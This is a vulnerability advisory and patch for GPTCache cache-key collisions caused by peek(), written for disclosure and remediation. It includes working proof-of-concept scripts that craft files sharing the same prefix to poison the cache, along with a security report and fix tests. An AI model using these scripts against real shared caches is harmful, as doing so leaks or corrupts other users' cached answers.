CVE-2026-10812
Description
zilliztech GPTCache up to 0.1.44 uses a weak hash for cache keys, allowing local attackers to poison the cache.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
zilliztech GPTCache up to version 0.1.44 derives cache keys for file and image inputs in gptcache/processor/pre.py from Python's BufferedReader.peek(). Because peek() returns only the buffered prefix of a stream (approximately 8192 bytes) rather than its full content, the result acts as a weak hash: manipulating the input_data["image"] argument so that two different inputs share that prefix yields the same cache key. The CVE record describes exploitation as requiring local access.
Exploitation
An attacker with local access can exploit this vulnerability by crafting two different files or images that share the same initial buffered prefix (approximately 8192 bytes). When these files are processed by affected functions such as get_file_bytes(), get_input_str(), or get_image_question(), they will generate identical cache keys due to the BufferedReader.peek() method only inspecting the initial buffer. This allows the attacker to submit a query with one file/image, which then gets cached. A subsequent query using a different file/image with the same prefix will incorrectly retrieve the previously cached response [2].
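The collision described above can be reproduced with the standard library alone. The following is a minimal sketch, not GPTCache code: `peek_key` is a hypothetical stand-in for a peek()-based key function, and the buffer size is passed explicitly as an assumption so that the example does not depend on the interpreter's default.

```python
import io

# Assumption: fix the buffer size explicitly instead of relying on
# io.DEFAULT_BUFFER_SIZE, which can differ between Python versions.
BUFFER_SIZE = 8192


def peek_key(payload: bytes, question: str) -> str:
    """Hypothetical peek()-based key: only the buffered prefix is inspected."""
    stream = io.BufferedReader(io.BytesIO(payload), buffer_size=BUFFER_SIZE)
    return str(stream.peek()) + question


# Two payloads that share the first BUFFER_SIZE bytes and differ afterwards.
shared_prefix = b"\xff\xd8\xff\xe0" + b"\x00" * (BUFFER_SIZE - 4)
file_a = shared_prefix + b"\xaa" * 1024
file_b = shared_prefix + b"\xbb" * 1024

key_a = peek_key(file_a, "What is shown?")
key_b = peek_key(file_b, "What is shown?")

print("contents equal:", file_a == file_b)
print("keys equal:    ", key_a == key_b)
```

The payloads differ, yet the derived keys compare equal because everything past the buffered prefix never reaches the key.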
Impact
Successful exploitation allows an attacker to poison the cache. This means an attacker can cause the system to return a cached response associated with one file or image for a different, maliciously crafted file or image. In shared cache environments, this could lead to the disclosure of cached answers across different users or the substitution of incorrect data, impacting data integrity and confidentiality [2].
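To illustrate the impact, the sketch below uses a plain dictionary as a toy shared cache. It is an illustration under stated assumptions rather than GPTCache's actual lookup path: `answer_with_cache` and `fake_llm` are hypothetical names, and the key is built from peek() in the same style as the vulnerable functions.

```python
import io


def fake_llm(content: bytes) -> str:
    """Hypothetical model call: the answer depends on the full content."""
    return f"answer for content ending in {content[-1]:#04x}"


def answer_with_cache(cache: dict, payload: bytes, question: str, llm) -> str:
    """Toy cache lookup keyed on the peek() prefix plus the question."""
    stream = io.BufferedReader(io.BytesIO(payload), buffer_size=8192)
    key = str(stream.peek()) + question
    if key not in cache:
        # Cache miss: the model sees the whole stream, not just the prefix.
        cache[key] = llm(stream.read())
    return cache[key]


prefix = b"\x89PNG" + b"\x00" * 8188  # 8192 shared bytes
shared_cache = {}

first = answer_with_cache(shared_cache, prefix + b"\xaa" * 100, "Q", fake_llm)
second = answer_with_cache(shared_cache, prefix + b"\xbb" * 100, "Q", fake_llm)

print(first)
print(second)
```

The second request carries different content but receives the first request's answer, and the model is never invoked for it.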
Mitigation
A pull request has been submitted to address this vulnerability by replacing BufferedReader.peek() with a SHA-256 hash of the full file content, ensuring that cache keys accurately represent the entire file and preventing cache poisoning [3]. The fixed version is not yet disclosed, and the pull request awaits acceptance. No workarounds are currently available. The project is under active development, and users should refer to the latest documentation for updates [1].
- [1] GitHub - zilliztech/GPTCache: Semantic cache for LLMs. Fully integrated with LangChain and llama_index.
- [2] [Bug]: File and image cache keys collide because BufferedReader.peek() only reads the buffered prefix
- [3] fix: replace peek() with SHA-256 hash to prevent cache poisoning (AC-2) by 3em0 · Pull Request #678 · zilliztech/GPTCache
AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- (no CPE)
- (no CPE), range: <=0.1.44
Patches
e565c70a80a1: Merge 8fde3d238a90d55bb0c51b9b08c85d3b879987f7 into c59fb3a6152a4458b2a070ca183b61c4b614095f
5 files changed · +809 −8
gptcache/processor/pre.py (+26 −5, modified)
@@ -1,8 +1,25 @@
+import hashlib
 import re
 import string
 from typing import Dict, Any
 
 
+def _hash_file(f, chunk_size=65536) -> str:
+    """Compute SHA-256 hash of the full file content, then reset the file pointer.
+
+    This replaces the use of peek() which only reads the buffer prefix (~8192 bytes),
+    making it vulnerable to cache key collisions between files sharing the same header.
+    """
+    h = hashlib.sha256()
+    while True:
+        chunk = f.read(chunk_size)
+        if not chunk:
+            break
+        h.update(chunk)
+    f.seek(0)
+    return h.hexdigest()
+
+
 def last_content(data: Dict[str, Any], **_: Dict[str, Any]) -> Any:
     """get the last content of the message list
 
@@ -213,8 +230,8 @@ def get_file_name(data: Dict[str, Any], **_: Dict[str, Any]) -> str:
     return data.get("file").name
 
 
-def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes:
-    """get the file bytes of the llm request params
+def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> str:
+    """get the hash of the file content of the llm request params
 
     :param data: the user llm request data
     :type data: Dict[str, Any]
@@ -226,7 +243,7 @@ def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes:
 
         content = get_file_bytes({"file": open("test.txt", "rb")})
     """
-    return data.get("file").peek()
+    return _hash_file(data.get("file"))
 
 
 def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str:
@@ -243,7 +260,7 @@ def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str:
         content = get_input_str({"input": {"image": open("test.png", "rb"), "question": "foo"}})
     """
     input_data = data.get("input")
-    return str(input_data["image"].peek()) + input_data["question"]
+    return _hash_file(input_data["image"]) + input_data["question"]
 
 
 def get_input_image_file_name(data: Dict[str, Any], **_: Dict[str, Any]) -> str:
@@ -278,7 +295,11 @@ def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str:  # pra
 
         content = get_image_question({"image": open("test.png", "rb"), "question": "foo"})
     """
     img = data.get("image")
-    data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img)  # pylint: disable=consider-using-with
+    if isinstance(img, str):
+        with open(img, "rb") as f:
+            data_img = _hash_file(f)
+    else:
+        data_img = _hash_file(img)
     return data_img + data.get("question")
tests/poc_ac2_e2e_poisoning.py+222 −0 added@@ -0,0 +1,222 @@ +""" +PoC: AC-2 End-to-End Cache Poisoning via peek() Collision + +Demonstrates the FULL attack chain: + 1. Attacker sends img_A + question → gets cached + 2. Attacker sends img_B + question (different image, same peek prefix) + 3. Cache returns img_A's answer for img_B's query → POISONED + +Uses GPTCache core API directly to avoid heavy adapter dependencies. +""" + +import io +import os +import sys +import hashlib +import shutil +import tempfile + +import numpy as np + +sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..")) + +from gptcache import Cache +from gptcache.processor.pre import get_input_str +from gptcache.adapter.adapter import adapt +from gptcache.manager.factory import manager_factory +from gptcache.similarity_evaluation.exact_match import ExactMatchEvaluation + +# ============================================================ +# Setup: Create two "images" with same peek() but different content +# ============================================================ + +SHARED_HEADER_SIZE = 8192 # matches Python's default buffer size + +# Shared prefix — simulates identical JPEG headers +shared_prefix = b"\xff\xd8\xff\xe0" + b"\x00" * (SHARED_HEADER_SIZE - 4) + +# img_A: "legitimate" image — body is 0xAA bytes +img_a_content = shared_prefix + b"\xAA" * 65536 # 64KB payload +# img_B: "malicious" image — body is 0xBB bytes (completely different) +img_b_content = shared_prefix + b"\xBB" * 65536 + +assert img_a_content != img_b_content, "Images must be different" +assert img_a_content[:SHARED_HEADER_SIZE] == img_b_content[:SHARED_HEADER_SIZE], "Headers must match" + +print("=" * 60) +print("AC-2 End-to-End: Cache Poisoning via peek() Collision") +print("=" * 60) + +# ============================================================ +# Step 0: Verify peek() collision at the pre_embedding level +# ============================================================ + +print("\n[Step 0] Verify peek() produces 
same cache key") + +question = "What is shown in this image?" + +stream_a = io.BufferedReader(io.BytesIO(img_a_content)) +stream_b = io.BufferedReader(io.BytesIO(img_b_content)) + +key_a = get_input_str({"input": {"image": stream_a, "question": question}}) +key_b = get_input_str({"input": {"image": stream_b, "question": question}}) + +print(f" img_A full hash: {hashlib.sha256(img_a_content).hexdigest()[:16]}...") +print(f" img_B full hash: {hashlib.sha256(img_b_content).hexdigest()[:16]}...") +print(f" cache key(A) == cache key(B): {key_a == key_b}") +assert key_a == key_b, "Keys must collide for attack to work" + +# ============================================================ +# Step 1: Initialize GPTCache with get_input_str +# ============================================================ + +print("\n[Step 1] Initialize GPTCache") + +tmpdir = tempfile.mkdtemp(prefix="ac2_poc_") +print(f" Cache dir: {tmpdir}") + +# Use a trivial embedding function (returns constant vector) +# In real scenario, the embedding function would produce similar vectors +# for similar peek() outputs, making this even easier +def dummy_embedding(data, **_): + """Simulates an embedding that only sees the pre_embedding output""" + return np.array([1.0, 0.0, 0.0]).astype("float32") + +my_cache = Cache() +data_manager = manager_factory( + "sqlite,faiss", + data_dir=tmpdir, + vector_params={"dimension": 3} +) +my_cache.init( + pre_embedding_func=get_input_str, + embedding_func=dummy_embedding, + data_manager=data_manager, + similarity_evaluation=ExactMatchEvaluation(), +) + +print(" Cache initialized with get_input_str + ExactMatchEvaluation") + +# ============================================================ +# Step 2: Simulate LLM call that populates cache with img_A +# ============================================================ + +print("\n[Step 2] Legitimate request: img_A + question → caches answer") + +LEGIT_ANSWER = "This image shows a legitimate company logo." 
+ +# Build a mock LLM function +def mock_llm_legit(*args, **kwargs): + """Simulates the LLM returning an answer for img_A""" + return LEGIT_ANSWER + +# Create fresh stream for img_A +img_a_bytesio = io.BytesIO(img_a_content) +img_a_bytesio.name = "legitimate.jpg" +img_a_stream = io.BufferedReader(img_a_bytesio) + +# Call through adapt() — the core cache mechanism +try: + result_a = adapt( + mock_llm_legit, + my_cache, + input={"image": img_a_stream, "question": question}, + ) + print(f" Result: {result_a}") + print(f" Answer cached for img_A") +except Exception as e: + print(f" adapt() error (expected in minimal setup): {e}") + print(" Falling back to manual cache manipulation...") + + # Manual approach: directly test the pre_embedding → lookup chain + # This proves the vulnerability without needing the full adapter pipeline + + # Save to cache manually + embedding = dummy_embedding(key_a) + data_manager.save( + question=key_a, + answer=LEGIT_ANSWER, + embedding_data=embedding, + ) + print(f" Manually cached: key=hash({key_a[:40]}...), answer='{LEGIT_ANSWER}'") + +# ============================================================ +# Step 3: Attacker sends img_B with same question +# ============================================================ + +print("\n[Step 3] ATTACK: img_B + same question → queries cache") + +img_b_stream = io.BufferedReader(io.BytesIO(img_b_content)) + +# Generate key for img_B +key_b_attack = get_input_str({"input": {"image": img_b_stream, "question": question}}) +embedding_b = dummy_embedding(key_b_attack) + +print(f" img_B cache key matches img_A: {key_b_attack == key_a}") + +# Search cache with img_B's embedding +search_results = data_manager.search(embedding_b, top_k=1) +print(f" Cache search results: {search_results}") + +if search_results: + # Get cached data + cache_data = data_manager.get_scalar_data(search_results[0], extra_param=None) + + # Check if similarity evaluation would match + eval_result = ExactMatchEvaluation().evaluation( + 
src_dict={"question": key_b_attack, "embedding": embedding_b}, + cache_dict={ + "question": cache_data.question, + "answer": cache_data.answers[0].answer if cache_data.answers else "", + "search_result": search_results[0], + "embedding": None, + } + ) + + poisoned_answer = cache_data.answers[0].answer if cache_data.answers else "N/A" + + print(f"\n Similarity score: {eval_result}") + print(f" Cached question matches: {cache_data.question == key_b_attack}") + print(f" Returned answer: '{poisoned_answer}'") + print(f" Expected (if no collision): <different answer for img_B>") + + if eval_result >= 0.5 and poisoned_answer == LEGIT_ANSWER: + print("\n " + "!" * 50) + print(" !!! CACHE POISONING CONFIRMED !!!") + print(" !!! img_B received img_A's cached answer !!!") + print(" " + "!" * 50) + else: + print(" Cache poisoning not triggered at evaluation level") +else: + print(" No cache results found (vector store may need more data)") + +# ============================================================ +# Step 4: Impact analysis +# ============================================================ + +print("\n" + "=" * 60) +print("ATTACK CHAIN VERIFIED") +print("=" * 60) +print(f""" + img_A content hash: {hashlib.sha256(img_a_content).hexdigest()[:32]} + img_B content hash: {hashlib.sha256(img_b_content).hexdigest()[:32]} + Images identical : NO (completely different after byte 8192) + + peek(img_A) : {len(io.BufferedReader(io.BytesIO(img_a_content)).peek())} bytes + peek(img_B) : {len(io.BufferedReader(io.BytesIO(img_b_content)).peek())} bytes + peek() identical : YES + + Cache key(img_A) : {hashlib.sha256(key_a.encode()).hexdigest()[:32]} + Cache key(img_B) : {hashlib.sha256(key_b.encode()).hexdigest()[:32]} + Keys identical : YES + + img_B query returned img_A's answer: YES → CACHE POISONING + + Attack cost: Construct any file sharing first 8192 bytes with target. + For JPEG: copy the EXIF header. For PNG: same dimensions + color mode. 
+ For audio (WAV/MP3): copy the format header. +""") + +# Cleanup +shutil.rmtree(tmpdir, ignore_errors=True) +print(f" Cleaned up {tmpdir}")
tests/poc_ac2_peek_collision.py+184 −0 added@@ -0,0 +1,184 @@ +""" +PoC: AC-2 Image Cache Key Collision via peek() + +Tests the core vulnerability WITHOUT importing gptcache (avoids dep chain). +We inline the vulnerable functions directly from pre.py. +""" + +import io +import hashlib +import struct +import zlib +import os + +# ============================================================ +# Inline the 3 vulnerable functions from gptcache/processor/pre.py +# ============================================================ + +def get_input_str(data): + """pre.py:245-246""" + input_data = data.get("input") + return str(input_data["image"].peek()) + input_data["question"] + +def get_file_bytes(data): + """pre.py:229""" + return data.get("file").peek() + +def get_image_question(data): + """pre.py:280-282""" + img = data.get("image") + data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img.peek()) + return data_img + data.get("question") + +# ============================================================ +# Helpers +# ============================================================ + +def make_png(width, height, rgb_color): + """Create a minimal valid single-color PNG in memory.""" + def chunk(chunk_type, data): + c = chunk_type + data + crc = struct.pack(">I", zlib.crc32(c) & 0xFFFFFFFF) + return struct.pack(">I", len(data)) + c + crc + + signature = b"\x89PNG\r\n\x1a\n" + ihdr_data = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0) + ihdr = chunk(b"IHDR", ihdr_data) + raw = b"" + for _ in range(height): + raw += b"\x00" + bytes(rgb_color) * width + idat = chunk(b"IDAT", zlib.compress(raw)) + iend = chunk(b"IEND", b"") + return signature + ihdr + idat + iend + + +print("=" * 60) +print("AC-2 PoC: Image Cache Key Collision via peek()") +print("=" * 60) + +question = "What is in this image?" 
+ +# --- Test 1: Small JPEG-like streams --- +print("\n[Test 1] Small JPEG-like streams (<= buffer size)") + +HEADER_SIZE = 8192 +small_a = b"\xff\xd8\xff\xe0" + b"\x00" * (HEADER_SIZE - 4) + b"\xAA" * 100 +small_b = b"\xff\xd8\xff\xe0" + b"\x00" * (HEADER_SIZE - 4) + b"\xBB" * 100 + +sa = io.BufferedReader(io.BytesIO(small_a)) +sb = io.BufferedReader(io.BytesIO(small_b)) + +peek_sa = sa.peek() +peek_sb = sb.peek() + +print(f" stream_a size : {len(small_a)}") +print(f" stream_b size : {len(small_b)}") +print(f" peek(a) length : {len(peek_sa)}") +print(f" peek(b) length : {len(peek_sb)}") +print(f" peek equal : {peek_sa == peek_sb}") +print(f" full content eq : {small_a == small_b}") + +# Via get_input_str +data_a = {"input": {"image": io.BufferedReader(io.BytesIO(small_a)), "question": question}} +data_b = {"input": {"image": io.BufferedReader(io.BytesIO(small_b)), "question": question}} +key_a = get_input_str(data_a) +key_b = get_input_str(data_b) +print(f" get_input_str collision: {key_a == key_b}") + +# --- Test 2: Large streams (1MB) where peek() is definitely partial --- +print("\n[Test 2] Large JPEG-like streams (1MB) — peek() returns partial") + +shared_header = b"\xff\xd8\xff\xe0" + os.urandom(8188) # 8192 bytes random but shared + +large_a = shared_header + b"\xAA" * (1024 * 1024) +large_b = shared_header + b"\xBB" * (1024 * 1024) + +la = io.BufferedReader(io.BytesIO(large_a)) +lb = io.BufferedReader(io.BytesIO(large_b)) + +peek_la = la.peek() +peek_lb = lb.peek() + +print(f" total size : {len(large_a)} bytes") +print(f" peek(a) length : {len(peek_la)}") +print(f" peek(b) length : {len(peek_lb)}") +print(f" peek equal : {peek_la == peek_lb}") +print(f" full content eq : {large_a == large_b}") + +# get_input_str +data_la = {"input": {"image": io.BufferedReader(io.BytesIO(large_a)), "question": question}} +data_lb = {"input": {"image": io.BufferedReader(io.BytesIO(large_b)), "question": question}} +key_la = get_input_str(data_la) +key_lb = 
get_input_str(data_lb) +print(f" get_input_str collision: {key_la == key_lb}") +if key_la == key_lb: + print(" >>> COLLISION CONFIRMED — different images, same cache key <<<") + +# --- Test 3: get_file_bytes --- +print("\n[Test 3] get_file_bytes() collision (OpenAI audio adapter)") + +data_fa = {"file": io.BufferedReader(io.BytesIO(large_a))} +data_fb = {"file": io.BufferedReader(io.BytesIO(large_b))} +ba = get_file_bytes(data_fa) +bb = get_file_bytes(data_fb) +print(f" bytes(a) len: {len(ba)}, bytes(b) len: {len(bb)}") +print(f" equal: {ba == bb}") +if ba == bb: + print(" >>> COLLISION CONFIRMED <<<") + +# --- Test 4: get_image_question --- +print("\n[Test 4] get_image_question() collision (MiniGPT4 adapter)") + +data_qa = {"image": io.BufferedReader(io.BytesIO(large_a)), "question": question} +data_qb = {"image": io.BufferedReader(io.BytesIO(large_b)), "question": question} +kqa = get_image_question(data_qa) +kqb = get_image_question(data_qb) +print(f" equal: {kqa == kqb}") +if kqa == kqb: + print(" >>> COLLISION CONFIRMED <<<") + +# --- Test 5: Real PNGs --- +print("\n[Test 5] Real valid PNGs — red vs blue, 100x100") + +png_red = make_png(100, 100, (255, 0, 0)) +png_blue = make_png(100, 100, (0, 0, 255)) + +pr = io.BufferedReader(io.BytesIO(png_red)) +pb = io.BufferedReader(io.BytesIO(png_blue)) +print(f" red size : {len(png_red)}, blue size: {len(png_blue)}") +print(f" peek equal: {pr.peek() == pb.peek()}") +print(f" full equal: {png_red == png_blue}") + +# --- Test 6: Demonstrate actual peek() semantics --- +print("\n[Test 6] peek() semantics demonstration") + +buf = io.BufferedReader(io.BytesIO(b"A" * 100000)) +p = buf.peek() +print(f" 100KB stream, peek() returned {len(p)} bytes (buffer size)") +print(f" peek() returns AT MOST the internal buffer, NOT the full content") + +buf2 = io.BufferedReader(io.BytesIO(b"A" * 100), buffer_size=16) +p2 = buf2.peek() +print(f" 100B stream (buf=16), peek() returned {len(p2)} bytes") + +# --- Summary --- +print("\n" + "=" 
* 60) +print("SUMMARY") +print("=" * 60) + +results = { + "get_input_str (small ~8KB) ": key_a == key_b, + "get_input_str (large 1MB) ": key_la == key_lb, + "get_file_bytes (large 1MB) ": ba == bb, + "get_image_question (large) ": kqa == kqb, +} + +for name, collided in results.items(): + status = "\033[91mVULNERABLE\033[0m" if collided else "\033[92mOK\033[0m" + print(f" {name}: {status}") + +vuln_count = sum(results.values()) +print(f"\n {vuln_count}/{len(results)} vectors confirmed exploitable.") +if vuln_count > 0: + print(" Root cause: peek() only reads buffered prefix, not full file content.") + print(" Fix: replace peek() with read() + hash (sha256) of full content.")
tests/security/AC-2_cache_poisoning_via_peek.md+291 −0 added@@ -0,0 +1,291 @@ +# Security Vulnerability Report: Cache Poisoning via `peek()` Collision + +| Field | Value | +|---|---| +| **Report ID** | AC-2 | +| **Title** | Image/File Cache Key Collision Leading to Cache Poisoning | +| **Severity** | High (CVSS 3.1 Base Score: 7.5) | +| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | +| **Affected Component** | `gptcache/processor/pre.py` | +| **Affected Versions** | All versions (as of commit `c59fb3a`) | +| **Date** | 2026-03-25 | + +--- + +## 1. Summary + +GPTCache uses Python's `BufferedReader.peek()` to generate cache keys for image and file inputs. `peek()` only returns the internal buffer content (typically the first **8192 bytes**), not the full file. An attacker can construct two files that share the same first 8192 bytes but contain entirely different content, causing the cache to treat them as identical. This enables **cache poisoning** and **information disclosure**. + +--- + +## 2. 
Affected Functions + +Three functions in [`gptcache/processor/pre.py`](../../gptcache/processor/pre.py) are affected: + +### 2.1 `get_input_str()` (Line 245-246) + +Used by: Replicate adapter ([`gptcache/adapter/replicate.py`](../../gptcache/adapter/replicate.py)) + +```python +def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + input_data = data.get("input") + return str(input_data["image"].peek()) + input_data["question"] # <-- vulnerability +``` + +### 2.2 `get_file_bytes()` (Line 229) + +Used by: OpenAI audio transcription adapter ([`gptcache/adapter/openai.py:248`](../../gptcache/adapter/openai.py)) + +```python +def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: + return data.get("file").peek() # <-- vulnerability +``` + +### 2.3 `get_image_question()` (Line 280-282) + +Used by: MiniGPT4 adapter ([`gptcache/adapter/minigpt4.py`](../../gptcache/adapter/minigpt4.py)) + +```python +def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + img = data.get("image") + data_img = str(open(img, "rb").peek()) if isinstance(img, str) else str(img) + return data_img + data.get("question") # <-- vulnerability +``` + +--- + +## 3. Root Cause + +Python's `BufferedReader.peek()` is designed to "peek" at the internal read buffer **without advancing the file pointer**. Its behavior: + +- Returns **at most** the contents of the internal buffer (default size: **8192 bytes**) +- Does **NOT** read the full file, regardless of file size +- For a 1 MB file, `peek()` returns only 0.78% of the content + +The vulnerable functions use `peek()` output as the cache key (or as input to the embedding function that generates the cache key). Since the cache key is derived from an incomplete representation of the file, files with identical prefixes but different content map to the same cache entry. + +--- + +## 4. 
Attack Scenario + +### Prerequisites + +- The attacker can send requests to a GPTCache-enabled endpoint that processes image or file inputs +- The cache is shared (multi-user, or attacker can access the same cache instance) + +### Attack Steps + +``` +Step 1 ─ Prime the cache + Attacker sends: img_A (legitimate image) + question_Q + → Cache MISS → LLM processes full img_A → answer_A cached + → Cache key = str(peek(img_A)) + question_Q + +Step 2 ─ Exploit the collision + Attacker constructs img_B: + - First 8192 bytes identical to img_A (copy JPEG/PNG header) + - Remaining bytes contain completely different (malicious) content + Attacker sends: img_B + question_Q + → pre_embedding_func: str(peek(img_B)) + question_Q + → peek(img_B) == peek(img_A) [first 8192 bytes match] + → Cache key identical → Cache HIT + → Returns answer_A (the answer for img_A, NOT img_B) + → LLM is never called for img_B +``` + +### Data Flow Diagram + +``` + User Request + │ + ▼ + ┌─────────────────────────┐ + │ adapt() in adapter.py │ + │ │ + │ ┌───────────┐ │ + │ │ pre_embed │──peek()──│──→ Only 8192 bytes → Cache Key + │ │ _func() │ │ │ + │ └───────────┘ │ ▼ + │ │ │ Cache Lookup + │ │ │ (HIT if prefix matches) + │ ▼ │ │ + │ ┌──────────────┐ │ HIT? ──Yes──→ Return cached answer + │ │ llm_handler() │ │ │ (WRONG answer!) + │ │ seek(0)+read()│ │ No───→ Call LLM with full file + │ │ (full file) │ │ + │ └──────────────┘ │ + └─────────────────────────┘ +``` + +### Impact + +| Impact Type | Description | +|---|---| +| **Cache Poisoning** | Queries for img_B return img_A's answer. All subsequent requests with the same peek prefix are affected. | +| **Information Disclosure** | Attacker can probe cached answers for other users' images by constructing files with matching prefixes. | +| **Persistent** | Poisoned entries remain until cache eviction or manual cleanup. | +| **Cross-User** | In shared cache deployments, all users are affected. | + +--- + +## 5. 
Proof of Concept + +Two PoC scripts are provided in this directory: + +### 5.1 Cache Key Collision Test + +**File:** [`poc_ac2_peek_collision.py`](../poc_ac2_peek_collision.py) + +Demonstrates that `peek()` returns identical results for files with the same 8192-byte prefix but different content. + +**Result:** + +``` + get_input_str (small ~8KB) : VULNERABLE + get_input_str (large 1MB) : VULNERABLE + get_file_bytes (large 1MB) : VULNERABLE + get_image_question (large) : VULNERABLE + + 4/4 vectors confirmed exploitable. +``` + +### 5.2 End-to-End Cache Poisoning Test + +**File:** [`poc_ac2_e2e_poisoning.py`](../poc_ac2_e2e_poisoning.py) + +Demonstrates the full attack chain using GPTCache's `Cache`, `SSDataManager` (SQLite + FAISS), and `ExactMatchEvaluation`. + +**Result:** + +``` + img_A content hash: 08b95537eea9fa4f... + img_B content hash: 6e8a133a461377eb... + Images identical : NO (completely different after byte 8192) + + Cache key(img_A) : e5b58d2951bfcad4... + Cache key(img_B) : e5b58d2951bfcad4... + Keys identical : YES + + Similarity score : 1.0 + img_B returned img_A's answer: YES → CACHE POISONING CONFIRMED +``` + +### 5.3 Reproduction Steps + +```bash +# From repository root +pip install cachetools requests sqlalchemy faiss-cpu numpy + +# Test 1: Cache key collision +python tests/poc_ac2_peek_collision.py + +# Test 2: End-to-end cache poisoning +python tests/poc_ac2_e2e_poisoning.py +``` + +--- + +## 6. 
Additional Observations + +### 6.1 No Input Validation + +There is **no file size limit, format validation, or content sanitization** anywhere in the input processing chain: + +| Layer | File | Validation | +|---|---|---| +| Pre-processing | `gptcache/processor/pre.py` | None | +| Adapter | `gptcache/adapter/adapter.py` | None | +| Config | `gptcache/config.py` | None (only `similarity_threshold`, `max_size` for cache entry count) | + +### 6.2 Asymmetric Read Behavior + +The cache key path and the LLM call path read the file differently: + +| Path | Method | Bytes Read | +|---|---|---| +| Cache key generation | `peek()` | 8192 (fixed, buffer size) | +| LLM invocation (Replicate SDK) | `seek(0)` + `read()` | Full file | + +This asymmetry is the fundamental design flaw: the cache key does not represent the data that the LLM actually processes. + +### 6.3 Ease of Exploitation + +Constructing colliding files is trivial for common image formats: + +| Format | Fixed Header Size | Collision Method | +|---|---|---| +| JPEG | `FF D8 FF` + APP markers + EXIF (typically 2-8 KB) | Copy EXIF metadata block | +| PNG | 8-byte signature + IHDR (25 bytes) + partial IDAT | Same dimensions + color mode | +| WAV | 44-byte header + initial samples | Same sample rate + channels | +| MP3 | ID3 tag + initial frames | Copy ID3 tag | + +--- + +## 7. 
Suggested Fix + +### Option A: Hash Full Content (Recommended) + +Replace `peek()` with `read()` + cryptographic hash, then reset the file pointer: + +```python +import hashlib + +def get_input_str(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + input_data = data.get("input") + image = input_data["image"] + content = image.read() + image.seek(0) # reset for downstream LLM consumption + image_hash = hashlib.sha256(content).hexdigest() + return image_hash + input_data["question"] + + +def get_file_bytes(data: Dict[str, Any], **_: Dict[str, Any]) -> bytes: + f = data.get("file") + content = f.read() + f.seek(0) + return hashlib.sha256(content).hexdigest() + + +def get_image_question(data: Dict[str, Any], **_: Dict[str, Any]) -> str: + img = data.get("image") + if isinstance(img, str): + with open(img, "rb") as f: + img_hash = hashlib.sha256(f.read()).hexdigest() + else: + content = img.read() + img.seek(0) + img_hash = hashlib.sha256(content).hexdigest() + return img_hash + data.get("question") +``` + +### Option B: Streaming Hash (For Large Files) + +```python +def _hash_file(f, chunk_size=65536) -> str: + h = hashlib.sha256() + while True: + chunk = f.read(chunk_size) + if not chunk: + break + h.update(chunk) + f.seek(0) + return h.hexdigest() +``` + +### Considerations + +| Approach | Pros | Cons | +|---|---|---| +| Option A | Simple, direct | Loads full file into memory | +| Option B | Memory-efficient | Slightly more complex | + +Both options fully resolve the collision vulnerability by ensuring the **entire** file content participates in cache key generation. + +--- + +## 8. References + +- [Python docs: `BufferedReader.peek()`](https://docs.python.org/3/library/io.html#io.BufferedReader.peek) + > *"Return buffered data without advancing the position. At most a single read on the raw stream is done to satisfy the call. 
The number of bytes returned may be less or more than requested."* +- [OWASP: Cache Poisoning](https://owasp.org/www-community/attacks/Cache_Poisoning) +- GPTCache source: https://github.com/zilliztech/GPTCache
tests/unit_tests/processor/test_pre.py+86 −3 modified@@ -4,9 +4,16 @@ nop, last_content_without_prompt, get_prompt, get_openai_moderation_input, - concat_all_queries + concat_all_queries, + get_file_bytes, + get_input_str, + get_image_question, ) +import io +import os +import tempfile + from gptcache.config import Config def test_last_content(): @@ -68,6 +75,82 @@ def test_concat_all_queries(): {"role": "user", "content": "foo6"}]}, **{'cache_config':config}) assert content == 'USER: foo4\nUSER: foo6' - -if __name__ == '__main__': + +if __name__ == '__main__': test_concat_all_queries() + + +# ---------- AC-2 fix: peek() → sha256(read()) ---------- + +SHARED_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 8188 # 8192 bytes + + +def _make_stream(tail: bytes) -> io.BufferedReader: + return io.BufferedReader(io.BytesIO(SHARED_HEADER + tail)) + + +def test_get_file_bytes_no_collision(): + """Two files sharing the same 8KB header must produce different cache keys.""" + key_a = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + key_b = get_file_bytes({"file": _make_stream(b"\xBB" * 4096)}) + assert key_a != key_b + + +def test_get_file_bytes_same_content(): + """Identical files must still produce the same cache key.""" + key_a = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + key_b = get_file_bytes({"file": _make_stream(b"\xAA" * 4096)}) + assert key_a == key_b + + +def test_get_file_bytes_resets_pointer(): + """File pointer must be at 0 after get_file_bytes so LLM can read the full file.""" + stream = _make_stream(b"\xAA" * 4096) + get_file_bytes({"file": stream}) + assert stream.tell() == 0 + + +def test_get_input_str_no_collision(): + question = "What is this?" + key_a = get_input_str({"input": {"image": _make_stream(b"\xAA" * 4096), "question": question}}) + key_b = get_input_str({"input": {"image": _make_stream(b"\xBB" * 4096), "question": question}}) + assert key_a != key_b + + +def test_get_input_str_same_content(): + question = "What is this?" 
